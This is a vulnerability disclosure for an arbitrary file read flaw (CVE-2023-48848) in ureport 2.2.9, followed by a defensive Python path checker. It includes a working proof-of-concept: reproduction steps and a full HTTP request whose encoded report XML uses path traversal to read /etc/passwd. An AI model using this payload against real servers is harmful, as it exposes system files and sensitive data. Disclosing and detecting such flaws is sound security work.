CVE-2023-48848: GitHub - h00klod0er/ureport2-vuln
An arbitrary file read vulnerability in ureport v2.2.9 allows a remote attacker to arbitrarily read files on the server by inserting a crafted path.
When an image file is inserted into a report, there is no restriction on the image's format, path, or similar attributes, so malicious data can be submitted. This leads to an arbitrary file read that exposes file contents and sensitive data on the server. The vulnerable code lives in ureport2-core-2.2.9.jar, method com.bstek.ureport.provider.image.DefaultImageProvider:
The program does not validate the image path it receives; it concatenates the path directly into the FileInputStream constructor, which is what makes the arbitrary file read possible.
Reproducing the local build environment: use IDEA to build a Spring Boot demo project and add ureport2 as a dependency:
Exploiting the Vulnerability
Visit /ureport/designer/, click the image button, and set the path to /…/…/…/…/…/…/…/etc/passwd
Click the preview button
Then go to /ureport/preview?_u=p, where a base64-encoded picture is visible.
Decode its base64 content to obtain the contents of the /etc/passwd file.
The HTTP message:
Content of the content parameter:
The base64 image content can be seen in the response to /ureport/preview?_u=p
PoC content:
POST /ureport/designer/savePreviewData HTTP/1.1
Host: 192.168.100.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5796
Origin: http://192.168.100.171:8080
Connection: close
Referer: http://192.168.100.171:8080/ureport/designer/
Cookie: JSESSIONID=6041627D8F7E4701AA566790B40078A2
content=%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%253Cureport%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A1%2522%2520row%253D%25221%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B1%2522%2520row%253D%25221%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C1%2522%2520row%253D%25221%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D1%2522%2520row%253D%25221%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A2%2522%2520row%253D%25222%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B2%2522%2520row%253D%25222
%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522C2%2522%2520row%253D%25222%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%25229%2522%2520forecolor%253D%25220%252C0%252C0%2522%2520font-family%253D%2522%25E5%25AE%258B%25E4%25BD%2593%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Cimage-value%2520source%253D%2522text%2522%253E%253Ctext%253E%253C!%255BCDATA%255B%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%255D%255D%253E%253C%252Ftext%253E%253C%252Fimage-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D2%2522%2520row%253D%25222%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522A3%2522%2520row%253D%25223%2522%2520col%253D%25221%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522B3%2522%2520row%253D%25223%2522%2520col%253D%25222%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name
%253D%2522C3%2522%2520row%253D%25223%2522%2520col%253D%25223%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Ccell%2520expand%253D%2522None%2522%2520name%253D%2522D3%2522%2520row%253D%25223%2522%2520col%253D%25224%2522%253E%253Ccell-style%2520font-size%253D%252210%2522%2520align%253D%2522center%2522%2520valign%253D%2522middle%2522%253E%253C%252Fcell-style%253E%253Csimple-value%253E%253C!%255BCDATA%255B%255D%255D%253E%253C%252Fsimple-value%253E%253C%252Fcell%253E%253Crow%2520row-number%253D%25221%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25222%2522%2520height%253D%252218%2522%252F%253E%253Crow%2520row-number%253D%25223%2522%2520height%253D%252218%2522%252F%253E%253Ccolumn%2520col-number%253D%25221%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25222%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25223%2522%2520width%253D%252280%2522%252F%253E%253Ccolumn%2520col-number%253D%25224%2522%2520width%253D%252280%2522%252F%253E%253Cpaper%2520type%253D%2522A4%2522%2520left-margin%253D%252290%2522%2520right-margin%253D%252290%2522%250A%2520%2520%2520%2520top-margin%253D%252272%2522%2520bottom-margin%253D%252272%2522%2520paging-mode%253D%2522fitpage%2522%2520fixrows%253D%25220%2522%250A%2520%2520%2520%2520width%253D%2522595%2522%2520height%253D%2522842%2522%2520orientation%253D%2522portrait%2522%2520html-report-align%253D%2522left%2522%2520bg-image%253D%2522%2522%2520html-interval-refresh-value%253D%25220%2522%2520column-enabled%253D%2522false%2522%253E%253C%252Fpaper%253E%253C%252Fureport%253E
Send the request above and take the JSESSIONID value from the Set-Cookie header of the response.
Use the obtained JSESSIONID as the cookie when requesting /ureport/preview?_u=p; the returned page contains the base64-encoded content of /etc/passwd in an img tag.
Decode this base64 to get the actual content of /etc/passwd.
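As an added defensive example (not code from ureport or from this report's author), the following checker double-decodes the content parameter sent to savePreviewData, walks the image-value cells of the report XML, and applies the path check that DefaultImageProvider lacks before opening a file; the allowed image directory and extension list are assumptions, and the request body is constructed to mirror the PoC above.

```python
import os
import posixpath
import urllib.parse
import xml.etree.ElementTree as ET

# Constructed sample, modelled on the savePreviewData PoC: the designer
# front end URL-encodes the "content" parameter twice (%253C -> %3C -> <).
SAMPLE_XML = (
    '<?xml version="1.0" encoding="UTF-8"?><ureport>'
    '<cell expand="None" name="A1" row="1" col="1">'
    '<simple-value><![CDATA[]]></simple-value></cell>'
    '<cell expand="None" name="C2" row="2" col="3"><image-value source="text">'
    '<text><![CDATA[/../../../../../../../etc/passwd]]></text></image-value></cell>'
    '<cell expand="None" name="D2" row="2" col="4"><image-value source="text">'
    '<text><![CDATA[logo.png]]></text></image-value></cell>'
    '</ureport>'
)
SAMPLE_BODY = "content=" + urllib.parse.quote(
    urllib.parse.quote(SAMPLE_XML, safe=""), safe="")

IMAGE_ROOT = "/opt/ureport/images"           # assumed directory images may come from
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}  # assumed allow-list of image types


def decode_content(body):
    """Return the report XML from a form body whose content value is URL-encoded twice."""
    params = urllib.parse.parse_qs(body)              # first decode
    return urllib.parse.unquote(params["content"][0])  # second decode


def is_safe_image_path(path, root=IMAGE_ROOT):
    """True only if path is relative, has an image extension and resolves inside root."""
    if not path or path.startswith("/") or "\\" in path:
        return False
    if os.path.splitext(path)[1].lower() not in ALLOWED_EXT:
        return False
    resolved = posixpath.normpath(posixpath.join(root, path))  # collapses ../ segments
    return resolved.startswith(root.rstrip("/") + "/")


def find_unsafe_image_paths(body):
    """List (cell name, path) for image-value text paths that fail the check."""
    report = ET.fromstring(decode_content(body))
    findings = []
    for cell in report.iter("cell"):
        img = cell.find("image-value")
        if img is None or img.get("source") != "text":
            continue
        text = (img.findtext("text") or "").strip()
        if not is_safe_image_path(text):
            findings.append((cell.get("name"), text))
    return findings
```

Running find_unsafe_image_paths over the sample body flags only cell C2, the traversal path from the PoC, while the relative logo.png in D2 passes.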